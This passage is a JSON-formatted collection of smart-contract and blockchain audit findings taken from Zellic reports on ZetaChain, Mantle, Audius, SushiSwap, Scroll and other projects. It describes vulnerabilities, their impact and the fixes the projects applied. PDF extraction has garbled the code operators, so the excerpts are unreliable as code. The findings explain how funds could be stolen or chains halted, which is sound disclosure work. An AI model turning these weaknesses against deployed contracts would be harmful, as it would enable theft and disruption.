msg.(type) { case *authz.MsgExec: innerMsgs, err :) msg.GetMessages() if err !) nil { return err } nestedLvl+) if err :) ald.checkDisabledMsgs(innerMsgs, true, nestedLvl); err !) nil { return err } case *authz.MsgGrant: authorization, err :) msg.GetAuthorization() if err !) nil { return err } url :) authorization.MsgTypeURL() if ald.isDisabledMsg(url) { return fmt.Errorf(\u201dfound disabled msg type: %s\u201d, url) } default: url :) sdk.MsgTypeURL(msg) Zellic ZetaChain if isAuthzInnerMsg &) ald.isDisabledMsg(url) { return fmt.Errorf(\u201dfound disabled msg type: %s\u201d, url) } } } return nil } Similar to the original finding in section 3.11 of the April 21st, 2023 report, this can be used to steal the transaction fees for the current block, and also to trigger an infinite loop, halting the entire chain. A new case should be added to the checkDisabledMsgs method to check the group.M sgSubmitProposal message in the same way as the existing messages: case *group.MsgSubmitProposal: innerMsgs, err :) msg.GetMsgs() if err !) nil { return err } nestedLvl+) if err :) ald.checkDisabledMsgs(innerMsgs, true, nestedLvl); err !) nil { return err } This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit cd279b80. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing nil check when parsing client event", + "labels": [ + "Zellic" + ], + "body": "Target: evm_client.go Category: Coding Mistakes Likelihood: High Severity: High : High One of the responsibilities of the Zetaclient is to watch for incoming transactions and handle any ZetaSent events emitted by the connector. logs, err :) connector.FilterZetaSent(&bind.FilterOpts{ Start: uint64(startBlock), End: &tb, Context: context.TODO(), }, []ethcommon.Address{}, []*big.Int{}) if err !) 
nil { ob.logger.ChainLogger.Warn().Err(err).Msgf(\u201dobserveInTx: FilterZetaSent error:\u201d) return } /) Pull out arguments from logs for logs.Next() { event :) logs.Event ob.logger.ExternalChainWatcher.Info().Msgf(\u201dTxBlockNumber %d Transaction Hash: %s Message : %s\u201d, event.Raw.BlockNumber, event.Raw.TxHash, event.Message) destChain :) common.GetChainFromChainID(event.DestinationChainId.Int64()) destAddr :) clienttypes.BytesToEthHex(event.DestinationAddress) When fetching the destination chain, common.GetChainFromChainID(event.Destinatio nChainId.Int64()) is used, which will return nil if the chain is not found. func GetChainFromChainID(chainID int64) *Chain { chains :) DefaultChainsList() for _, chain :) range chains { if chainID =) chain.ChainId { return chain } } Zellic ZetaChain return nil } Since a user is able to specify any value for the destination chain, if a nonsupported chain is used, then destChain will be nil and the following destChain.ChainName call will cause the client to crash. As all the clients watching the remote chain will see the same events, a malicious user (or a simple mistake entering the chain) will cause all the clients to crash. If the clients automatically restart and try to pick up from the block they were up to (the default), then they will crash again and enter into an endless restart and crash loop. This will prevent any incoming or outgoing transactions on the remote chain from being processed, effectively halting that chain\u2019s integration. There should be an explicit check to ensure that destChain is not nil and to skip the log if it is. It would also be a good idea to have a recovery mechanism that can handle any blocks that cause the client to crash and skip them. This will help prevent the remote chain from being paused if a similar bug occurs again. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 542eb37c. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.3 Admin policy check will always fail", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_out_tx_tracker.go Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The AddToOutTxTracker was changed from allowing bonded validators to call it to al- lowing an admin policy account or one of the current observers: func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) chain :) k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.ChainId) if chain =) nil { return nil, zetaObserverTypes.ErrSupportedChains } authorized :) false if msg.Creator =) k.zetaObserverKeeper.GetParams(ctx).GetAdminPolicyAccount (zetaObserverTypes.Policy_Type_out_tx_tracker) { authorized = true } ok, err :) k.IsAuthorized(ctx, msg.Creator, chain) if err !) nil { return nil, err } if ok { authorized = true } if !authorized { return nil, sdkerrors.Wrap(types.ErrNotAuthorized, fmt.Sprintf(\u201dCreator %s\u201d, msg.Creator)) } The issue is that the admin account is unlikely to be an observer, and so the check to IsAuthorized will return an error and the function will return. Zellic ZetaChain The admin policy will not work as expected and will be unable to add to the out tracker. The function should be refactored to allow for either the admin or the observers to access it instead of returning early if the caller is not an observer. 
This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 8222734c. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 The initialize function is not using the initializer modi- fier", + "labels": [ + "Zellic" + ], + "body": "Target: L1StandardBridge Category: Coding Mistakes Likelihood: Medium Severity: High : High The initialize function in L1StandardBridge is not using the initializer modifier but instead uses messenger to verify if the function has already been initialized or not. If this contract is accidently initialized with messenger set to address(0), an attacker can reinitialize the contract and thus steal tokens from the contract using the withdrawal functions. function initialize(address _l1messenger, address _l2TokenBridge, address _l1MantleAddress) public { require(messenger =) address(0), \u201dContract has already been initialized.\u201d); messenger = _l1messenger; l2TokenBridge = _l2TokenBridge; l1MantleAddress = _l1MantleAddress; } If there are any tokens in the contract and the messenger is set to address(0), an at- tacker can steal those tokens from the contract. Use the initializer modifier, or in the initialize function, revert the transaction if any parameter is address(0). Zellic Mantle Network This issue has been acknowledged by Mantle Network, and a fix was implemented in commit a53dd956. Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Protocol does not account for fee-on-transfer tokens", + "labels": [ + "Zellic" + ], + "body": "Target: L1StandardBridge Category: Business Logic Likelihood: Low Severity: Low : Low The _initiateERC20Deposit function does not account for tokens that charge fees on transfer. There is an expectation that the _amount of tokens deposited to the project contract when calling depositERC20To or depositERC20 will be equal to the amount of tokens deposited, and hence the mapping deposits is updated by adding the same _amount. However, there are ERC-20s that do, or may in the future, charge fees on transfer that will violate this expectation and affect the contract\u2019s accounting in the deposits mapping. Below is the function _initiateERC20Deposit from the L1StandardBridge contract (some part of the function is replaced by /) [removed code] to only show the relevant code): function _initiateERC20Deposit( address _l1Token, address _l2Token, address _from, address _to, uint256 _amount, uint32 _l2Gas, bytes calldata _data ) internal { /) When a deposit is initiated on L1, the L1 Bridge transfers the funds to itself for future /) withdrawals. The use of safeTransferFrom enables support of \u201dbroken tokens\u201d which do not /) return a boolean value. /) slither-disable-next-line reentrancy-events, reentrancy-benign IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount); /) [removed code] /) slither-disable-next-line reentrancy-benign deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount; Zellic Mantle Network /) slither-disable-next-line reentrancy-events emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount, _data); } The deposits mapping will overestimate the amount of fee-on-transfer tokens in the contract. 
Consider implementing a require check that compares the contract\u2019s balance before and after a token transfer to ensure that the expected amount of tokens are trans- ferred. function _initiateERC20Deposit( address _l1Token, address _l2Token, address _from, address _to, uint256 _amount, uint32 _l2Gas, bytes calldata _data ) internal { /) When a deposit is initiated on L1, the L1 Bridge transfers the funds to itself for future /) withdrawals. The use of safeTransferFrom enables support of \u201dbroken tokens\u201d which do not /) return a boolean value. /) slither-disable-next-line reentrancy-events, reentrancy-benign uint256 expectedTransferBalance = IERC20(_l1Token).balanceOf(address(this)) + _amount; IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount); uint256 postTransferBalance = IERC20(_l1Token).balanceOf(address(this)); require(expectedTransferBalance =) postTransferBalance, \u201dFee on transfer tokens not supported\u201d); Zellic Mantle Network /) [removed code] /) slither-disable-next-line reentrancy-benign deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount; /) slither-disable-next-line reentrancy-events emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount, _data); } This issue has been acknowledged by Mantle Network, and a fix was implemented in commit 305b5cab. Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Possible rounding issues in L1MantleToken", + "labels": [ + "Zellic" + ], + "body": "Target: L1MantleToken Category: Business Logic Likelihood: N/A Severity: Informational : Informational The mint function in L1MantleToken calculated the maximumMintAmount using the fol- lowing formula: uint256 maximumMintAmount = (totalSupply() * mintCapNumerator) / MINT_CAP_DENOMINATOR; Below is the mint function: function mint(address _recipient, uint256 _amount) public onlyOwner { uint256 maximumMintAmount = (totalSupply() * mintCapNumerator) / MINT_CAP_DENOMINATOR; if (_amount > maximumMintAmount) { revert MantleToken_MintAmountTooLarge(_amount, maximumMintAmount); } if (block.timestamp < nextMint) revert MantleToken_NextMintTimestampNotElapsed(block.timestamp, nextMint); nextMint = block.timestamp + MIN_MINT_INTERVAL; _mint(_recipient, _amount); } If the totalSupply and mintCapNumerator are small enough, they might round down to zero when divided by MINT_CAP_DENOMINATOR. This would revert the transaction be- cause of the if condition following the calculation, and an admin would not be able to mint the tokens. It is advised to use the mintCapNumerator and _initialSupply at a value large enough so the above calculations do not round down the maximumMintAmo unt to zero. The mint function would revert. Zellic Mantle Network Set the _initialSupply in initialize and mintCapNumerator using setMintCapNumerator to values large enough so the division does not round down the maximumMintAmount to zero. Mantle Network rejected this finding and provided the response below: In our practical use case, it is unlikely to encounter situations where totalSupply and mintCapNumerator are too small. The situation mentioned in the report does not exist. 
Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Custom proxy architecture", + "labels": [ + "Zellic" + ], + "body": "Target: STBT.sol Category: Code Maturity Likelihood: Medium Severity: Medium : Low STBT will be deployed through a proxy contract, a common design that allows up- grading the code of a contract. STBT implements a custom proxy, which has strong constraints in the ability to up- grade the contract code and is arguably more error prone than other existing alterna- tives. Specifically, the storage layouts of the custom proxy implementation UpgradeableS TBT and of the implementation STBT are required to not clash. This is implemented by replicating the initial part of the storage layout of the implementation contract in the proxy. The STBT contract storage has an uint[300] array of placeholders, where UpgradableSTBT stores the address of the implementation contract. contract UpgradeableSTBT is Proxy { /) override address public owner; address public issuer; address public controller; address public moderator; /) new state below address public implementation; /) ...)) } contract STBT is Ownable, ISTBT { /) all the following three roles are contracts of governance/TimelockController.sol address public issuer; address public controller; address public moderator; Zellic Matrixdock uint[300] public placeholders; ///)) ...)) } This coupling of storage layouts is unusual and unnecessary; other proxy implementa- tions move the address of the implementation contract to a different storage location (via inline assembly), in order to not interfere with the implementation storage layout. This issue does not describe an exploitable security vulnerability in the code as re- viewed and is therefore reported as low severity. However, we believe this design choice introduces a higher risk of errors when upgrading the contract. We recommend evaluating the adoption of one of the several de facto standard proxy architectures that have been developed and proven effective, such as UUPSUpgrade- able. Matrixdock acknowledged the finding and will not remediate at this time. Zellic Matrixdock", + "html_url": "https://github.com/Zellic/publications/blob/master/Matrixdock-STBT - Zellic Audit Report.pdf" + }, + { + "title": "3.2 High rate of failures in test suite", + "labels": [ + "Zellic" + ], + "body": "Target: stbt-test.js Category: Code Maturity Likelihood: High Severity: Medium : Low One of the routine steps performed during the evaluation of a codebase is inspection of the accompanying test suite. When running the test suite using the instructions available in the README, we observed a failure rate of 52% (24 out of 46). Integrating a comprehensive test suite with a continuous integration service is tremen- dously important for preventing bugs from being deployed. For example, for one of the tests within it(\u201credeem: errors\u201d...))), it expects a revert to happen because of NO_SEND_PERMISSION, when the revert cause is because the msg .sender is not the issuer. await expect(stbt.connect(alice).redeem(123, '0x')) .to.be.revertedWith(\u201cNO_SEND_PERMISSION\u201d); We recommend fixing the failing tests and running the tests automatically (e.g., by integrating them with a CI service or in Git hooks). Matrixdock states that this issue was caused by an unsynced test file. The finding was fixed in commit 06c46695 and now all tests pass. 
Zellic Matrixdock", + "html_url": "https://github.com/Zellic/publications/blob/master/Matrixdock-STBT - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing PDA validation leading to multiple transfers", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Rewards are redeemed using a two-step process. First, signed messages are submit- ted and stored on-chain in an account of type VerifiedMessages. When the required amount of signed messages has been submitted, the EvaluateAttestations instruction is invoked to process the transfer. The instruction performs a number of checks on the provided accounts and then performs the token transfer to the destination account. In order to avoid a single transfer being repeated multiple times, a PDA is created (tr ansfer_account_info), marking the transfer as completed. The PDA is unique for the transfer since the address is derived from the details of the transfer, including a unique ID. In addition, the account containing the VerifiedMessages is deleted by zeroing its lamports. Both these measures are flawed and can be bypassed. The transfer_account_info account is not checked to be the intended PDA. An at- tacker can supply any signer account as an input to the transaction, and the account will be created successfully. This is because any signer account can be passed to the create_account system instruction, even if the invoke_signed function is used to per- form an invocation with signer seeds for the intended PDA. The signer seeds will just be ignored as they do not correspond to any account in the subtransaction. It is also possible to reuse the VerifiedMessages account, despite it having zero lam- ports, by referencing it in multiple instructions within the same transaction. This spe- cific issue is discussed more in detail in finding 3.3. It is possible to redeem rewards multiple times. We confirmed this issue by modifying an existing test. Ensure that the transfer_account_info account matches the expected PDA. Properly invalidate the data stored in the VerifiedMessages accounts so that it cannot be reused Zellic Audius, Inc even within the same transaction. The Audius team was alerted of this issue while the audit was ongoing. The issue was acknowledged within 10 minutes, and a remediation patch was suggested within 40 minutes. The patch was quickly deployed after review from both Zellic and Au- dius engineers to ensure a complete fix to the issue. 
The complete timeline of events follows (times in UTC, October 15th): 17:52 Audius is informed of the issue 18:02 Audius acknowledges the issue 18:31 Audius proposes a remediation 18:35 Zellic confirms that proposed remediation patches the issue, suggesting additional changes to invalidate VerifiedMessages accounts ~21:45 Audius finalizes remediation commits, including suggested additional changes ~22:00 Zellic confirms that remediation patches the issue ~22:00 Audius deploys and tests patch on testnet 23:31 Audius deploys patch on mainnet Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Ambiguous format for signed messages", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Code Maturity Likelihood: N/A Severity: Informational : Informational Verified messages are serialized as the concatenation of multiple fields separated by an underscore: /) Valid senders message let valid_message = [ transfer_data.eth_recipient.as_ref(), b\u201c_\u201d, transfer_data.amount.to_le_bytes().as_ref(), b\u201c_\u201d, transfer_data.id.as_ref(), b\u201c_\u201d, bot_oracle.eth_address.as_ref(), ] .concat(); This format is inherently prone to ambiguities. Consider the example of the following amount and id variations (other fields left out for simplicity): amount: id: _myid message: 123__myid amount: 123_ id: myid message: 123__myid The same message can be obtained by composing different amounts and ids. This issue can potentially be exploited to submit manipulated values to invocations of process_evaluate_attestations. The Audius team claimed amounts and ids containing underscores (0x5f bytes) cannot be generated by the relevant off-chain programs; Zellic Audius, Inc therefore, the issue is not exploitable in practice. For this reason this potentially critical issue is reported as informational. Even though the issue might not be exploitable at the time of this security audit, we strongly advise to review the message format to make ambiguities impossible in or- der to to harden the code and avoid being exposed to a risk of a critical issue. One remediation option would be to adopt a serialization format where the various fields have a fixed length. Another more flexible (but more complex and bug-prone) option would be to adopt a tag-length-value encoding (or just length-value). The Audius team acknowledged this finding. No change to the codebase was deemed to be immediately required. Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unsafe account deletion method", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Coding Mistakes Likelihood: N/A Severity: Low : Low The EvaluateAttestations instruction processes an account of type VerifiedMessages containing signed assertions authorizing the transfer of a given amount of tokens to a specific account. Towards the end of the instruction, the VerifiedMessages account is deleted by zeroing its lamports. This account deletion method is unsafe and prone to abuse. The reason is that account deletion does not happen immediately after an instruction is finished processing, and a zero-lamports account is usable by other instructions within the same transaction. 
It is possible to reuse a VerifiedMessages account after an EvaluateAttestations in- struction has been processed, despite it having zero lamports, by referencing the same account in multiple instructions within the one transaction. This issue was part of the exploit for issue 3.1. Invalidate or immediately delete VerifiedMessages. Invalidating the account can be done by zeroing the version field, thus making unpac king the account fail. Truly and fully deleting the account is not possible; however, it is possible to achieve an equivalent effect by zeroing the account lamports, resizing the account to zero, and transferring the account ownership to the system program. The Audius team was alerted of this issue while the audit was ongoing, together with issue 3.1. The Audius team quickly applied a remediation that invalidates the account, making unpack fail. Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "5.1 Missing registry check in restrict", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Coding Mistakes Likelihood: Low Severity: Low : Low Each ERC721Restrictable token has an associated registry contract for managing re- strictions. The restrict function in MightyNetERC721RestrictedRegistry does not check whether the contract itself is set as the target token\u2019s registry. function restrict( address tokenContract, uint256[] calldata tokenIds ) external override onlyRole(RESTRICTOR_ROLE) nonReentrant whenNotPaused { uint256 tokenCount = tokenIds.length; if (tokenCount =) 0) { revert InvalidTokenCount(tokenCount); } for (uint256 i = 0; i < tokenCount; +)i) { uint256 tokenId = tokenIds[i]; if (!ERC721Restrictable(tokenContract).exists(tokenId)) { revert InvalidToken(tokenContract, tokenId); } bytes32 tokenHash = keccak256( abi.encodePacked(tokenContract, tokenId) ); if (_isRestricted(tokenHash)) { revert TokenAlreadyRestricted(tokenContract, tokenId); } _tokenRestrictions[tokenHash] = msg.sender; } emit Restricted(tokenContract, tokenIds); } Zellic Mighty Bear Games This behavior would exacerbate upgrade or configuration issues in other contracts that interact with ERC721Restrictable tokens. If a contract tries to restrict a token using the incorrect registry contract, the action will fail silently. This might allow users to earn rewards on unlocked tokens. The restrict function should include an assertion that restrictedRegistry in the to- ken contract indeed matches address(this). Alternatively, Mighty Bear Games could add a separate safeRestrict function that includes this check. Mighty Bear Games acknowledges this finding.They added an assertion as recom- mended to the beginning of the scope of the restrict function in the V2 contract. If the assertion fails, it reverts with a newly introduced error ContractNotUsingThisRest rictedRegistry(address tokenContract). Mighty Bear Games has provided the response below: by adding the registry check to MightyNetERC721RestrictedRegistryV2. MightyNetERC721RestrictedRegistry was already deployed on ethereum. MightyNetERC721RestrictedRegistryV2 will be deployed on our L2 chain. 
Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "5.2 Restriction pattern creates centralization risk", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Business Logic Likelihood: Low Severity: Low : Low The MightyNetERC721RestrictedRegistry contract gives approved users or contracts the ability to restrict specific tokens. function restrict( address tokenContract, uint256[] calldata tokenIds ) external override onlyRole(RESTRICTOR_ROLE) nonReentrant whenNotPaused { uint256 tokenCount = tokenIds.length; if (tokenCount =) 0) { revert InvalidTokenCount(tokenCount); } for (uint256 i = 0; i < tokenCount; +)i) { uint256 tokenId = tokenIds[i]; if (!ERC721Restrictable(tokenContract).exists(tokenId)) { revert InvalidToken(tokenContract, tokenId); } bytes32 tokenHash = keccak256( abi.encodePacked(tokenContract, tokenId) ); if (_isRestricted(tokenHash)) { revert TokenAlreadyRestricted(tokenContract, tokenId); } _tokenRestrictions[tokenHash] = msg.sender; } emit Restricted(tokenContract, tokenIds); } Any address with the RESTRICTOR_ROLE can invoke this function to restrict any token in any token contract, without approval by users. Further, only the address that added a token\u2019s restriction is able to remove the restriction. Zellic Mighty Bear Games This exposes all assets to risks in approved contracts. If any such contracts experience key compromises, upgrade issues, or implementation vulnerabilities, then arbitrary assets might become locked. Additionally, this restriction pattern requires that both the admin and all approved contracts are highly trusted by users. We recommend that Mighty Bear Games implement a system where users first approve restrictions, use token transfers to hold staked assets, or clearly document trust assumptions associated with restrictors. Mighty Bear Games acknowledges this. As per their response, they have decided to go with the third recommendation and clearly document trust assumptions with restrictors. The following is their provided response: We are updating the readme to address this. Once the next deployment is done, we are planning to create a public github repository so that this readme can be player facing. We will also link to the repository from the whitepaper and a public facing FAQ page. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "5.3 Unnecessary complexity in _tokenRestrictions structure", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Code Maturity Likelihood: N/A Severity: Informational : Informational The MightyNetERC721RestrictedRegistry contract tracks restricted tokens by hashing a token\u2019s tokenContract address and tokenId value together, resulting in a tokenHash that is then stored in the contract. For instance, in the isRestricted function: bytes32 tokenHash = keccak256(abi.encodePacked(tokenContract, tokenId)); Then, tokenHash is used as a key for the _tokenRestrictions mapping to account for restricted tokens. mapping(bytes32 => address) private _tokenRestrictions; Together, they are used in the form _tokenRestrictions[tokenHash] multiple times in the contract. This adds unnecessary complexity in terms of maintainability and readability of the contract code. Additionally, the current implementation consumes slightly more gas than is needed. 
We recommend using a traditional nested mapping in order to improve the maintain- ability, readability, and gas efficiency of the contract: mapping(address => mapping(uint256 => address)) private _tokenRestrictions; Then, the state of a given token can be accessed with _tokenRestrictions[tokenCont ract][tokenId]. Zellic Mighty Bear Games might Bear Games acknowledges this. They have replaced their previously imple- mented _tokenRestrictions structure with a more efficient one as per our recom- mendation. The following is theire provided response: We have made this change to MightyNetERC721RestrictedRegistryV2. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The RouteProcessor3 should not hold nontransient tokens", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor3.sol Category: Business Logic Likelihood: N/A Severity: Informational : Informational There are numerous ways in which tokens can be stolen if they are held by the RoutePro- cessor3. For example, one way is by directly asking the contract to wrap or unwrap Ether and transfer it to the user. function wrapNative(uint256 stream, address from, address tokenIn, uint256 amountIn) private { uint8 directionAndFake = stream.readUint8(); address to = stream.readAddress(); if (directionAndFake & 1 =) 1) { /) wrap native address wrapToken = stream.readAddress(); if (directionAndFake & 2 =) 0) IWETH(wrapToken).deposit{value: amountIn}(); if (to !) address(this)) IERC20(wrapToken).safeTransfer(to, amountIn); } else { /) unwrap native if (directionAndFake & 2 =) 0) { if (from !) address(this)) IERC20(tokenIn).safeTransferFrom(from, address(this), amountIn); IWETH(tokenIn).withdraw(amountIn); } payable(to).transfer(address(this).balance); } } The wrapNative function can be reached with from =) address(this) by going from processRouteInternal to processNative, listed below, Zellic Sushiswap function processNative(uint256 stream) private { uint256 amountTotal = address(this).balance; distributeAndSwap(stream, address(this), NATIVE_ADDRESS, amountTotal); } then requesting a wrapNative operation in the swap. The tokens belonging to RoutePro- cessor3 will then be wrapped or unwrapped and transferred to the user. The RouteProcessor3 contract should not hold tokens except transiently, in the middle of a transaction. Document prominently that the RouteProcessor3 contract should not hold tokens. This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The safePermit call can be front-run", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor3.sol Category: Business Logic Likelihood: N/A Severity: Informational : Informational In the RouteProcessor3, a user can provide a cryptographically signed permit that, when consumed, will allow the contract to send tokens on behalf of the user. 
function applyPermit(address tokenIn, uint256 stream) private { /)address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) uint256 value = stream.readUint(); uint256 deadline = stream.readUint(); uint8 v = stream.readUint8(); bytes32 r = stream.readBytes32(); bytes32 s = stream.readBytes32(); IERC20Permit(tokenIn).safePermit(msg.sender, address(this), value, deadline, v, r, s); } The values of the signature are visible in the mempool until the transaction is executed. An attacker could use the genuine signature to invoke the exact call to IERC20Permit. permit. This does not cause any loss of funds, as the contract will not send funds on behalf of anyone except msg.sender and itself. However, it will cause a subsequent transac- tion to fail on IERC20Permit.safePermit, since the nonce will be incremented and the signature cannot be used again. Potentially, ignore reverts caused by safePermit calls. The contract will revert anyway when attempting to transfer tokens that are not authorized. This prevents a frontrun from halting the transaction. Zellic Sushiswap This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Overflow in readBytes", + "labels": [ + "Zellic" + ], + "body": "Target: InputStream.sol Category: Coding Mistakes Likelihood: Low Severity: Informational : Informational The InputStream library can be used to treat a bytes variable as a read-only stream, managing a cursor that is incremented automatically as the stream is consumed. The readBytes function can be used to read a sequence of bytes from the stream. The sequence is encoded as a length, followed by the contents of the sequence. Since the length is user provided, we believe a potential integer overflow exists in the function. function readBytes(uint256 stream) internal pure returns (bytes memory res) { assembly { let pos :) mload(stream) res :) add(pos, 32) let length :) mload(res) mstore(stream, add(res, length)) } } The stream variable keeps track of the current position of the stream. It is updated with the new position after the sequence is read, by adding the length of the sequence, which is user-provided. This addition can overflow. This does not represent an exploitable security issue in the context of RouteProces- sor3, since the data provided to readBytes is controlled by the same user that invokes the contract. We also believe no reasonable usage of the contract would trigger this bug by accident. For these reasons, this is reported as informational, with the purpose of providing hardening suggestions for the InputStream library, which might be important if it was used in other contexts. Zellic Sushiswap Ensure the calculation of the new stream position does not overflow. This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "1.1 RLP Circuit data table\u2019s byte_rev_idx is underconstrained", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Medium : Medium The RlpFsmDataTable consists of seven advice columns and aims to map (tx_id, for mat, byte_idx) to (byte_rev_idx, byte_value, bytes_rlc, gas_cost_acc). 
///)) Data table allows us a lookup argument from the RLP circuit to check the byte value at an index ///)) while decoding a tx of a given format. #)derive(Clone, Copy, Debug)] pub struct RlpFsmDataTable { ///)) Transaction index in the batch of txs. pub tx_id: Column, ///)) Format of the tx being decoded. pub format: Column, ///)) The index of the current byte. pub byte_idx: Column, ///)) The reverse index at this byte. pub byte_rev_idx: Column, ///)) The byte value at this index. pub byte_value: Column, ///)) The accumulated Random Linear Combination up until (including) the current byte. pub bytes_rlc: Column, ///)) The accumulated gas cost up until (including) the current byte. pub gas_cost_acc: Column, } There are various checks on this table, and one of them specifies what should happen when the instance (tx_id, format) changes. Scroll /) if (tx_id' =) tx_id and format' !) format) or (tx_id' !) tx_id and tx_id' !) 0) cb.condition( sum:)expr([ /) case 1 and:)expr([ tx_id_check_in_dt.is_equal_expression.expr(), not:)expr(format_check_in_dt.is_equal_expression.expr()), ]), /) case 2 and:)expr([ not:)expr(is_padding_in_dt.expr(Rotation:)next())(meta)), not:)expr(tx_id_check_in_dt.is_equal_expression.expr()), ]), ]), |cb| { /) byte_rev_idx =) 1 cb.require_equal( \u201dbyte_rev_idx is 1 at the last index\u201d, meta.query_advice(data_table.byte_rev_idx, Rotation:)cur()), 1.expr(), ); /) byte_idx' =) 1 cb.require_equal( \u201dbyte_idx resets to 1 for new format\u201d, meta.query_advice(data_table.byte_idx, Rotation:)next()), 1.expr(), ); /) bytes_rlc' =) byte_value' cb.require_equal( \u201dbytes_value and bytes_rlc are equal at the first index\u201d, meta.query_advice(data_table.byte_value, Rotation:)next()), meta.query_advice(data_table.bytes_rlc, Rotation:)next()), ); }, ); Here, in the case where tx_id' =) tx_id and format' !) format, or tx_id' !) tx_id and tx_id' !) 0, it is constrained that the current byte_rev_idx should be 1. However, this condition misses the final byte of the final transaction ID, where tx_id' !) tx_ id and tx_id' =) 0 as the next transaction is a padding. This implies that the final Scroll byte of the final transaction ID may not have byte_rev_idx =) 1, breaking the desired properties over the byte_rev_idx for the entire final transaction ID. The RlpFsmDataTable is used for a lookup, and this byte_rev_idx is also used later for various constraints. Using potentially incorrect values for byte_rev_idx may lead to further issues. The condition can be simply modified to tx_id' =) tx_id and format' !) format, or tx_id' !) tx_id. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.2 Missing range check for byte values in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical Descripton There is a check for the byte_value in the data table to be within a byte range. 
meta.lookup_any(\u201dbyte value check\u201d, |meta| { let cond = and:)expr([ meta.query_fixed(q_enabled, Rotation:)cur()), is_padding_in_dt.expr(Rotation:)cur())(meta), ]); vec![meta.query_advice(data_table.byte_value, Rotation:)cur())] .into_iter() .zip(range256_table.table_exprs(meta).into_iter()) .map(|(arg, table)| (cond.expr() * arg, table)) .collect() }); However, with the condition applied, it actually only checks that the padding rows have byte_value within the byte range. This means that the actual data rows\u2019 byte_va lues are never range checked properly. The byte_values are never range checked to be within [0, 256) range, which is a needed check. Change the condition to let cond = and:)expr([ meta.query_fixed(q_enabled, Rotation:)cur()), not:)expr(is_padding_in_dt.expr(Rotation:)cur())(meta)), ]); Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.3 The tag_length is never checked to be no more than max_le ngth", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Medium : Medium The max_length is used to define the maximum length of each tag, and it is also used to decide the base to use to accumulate the 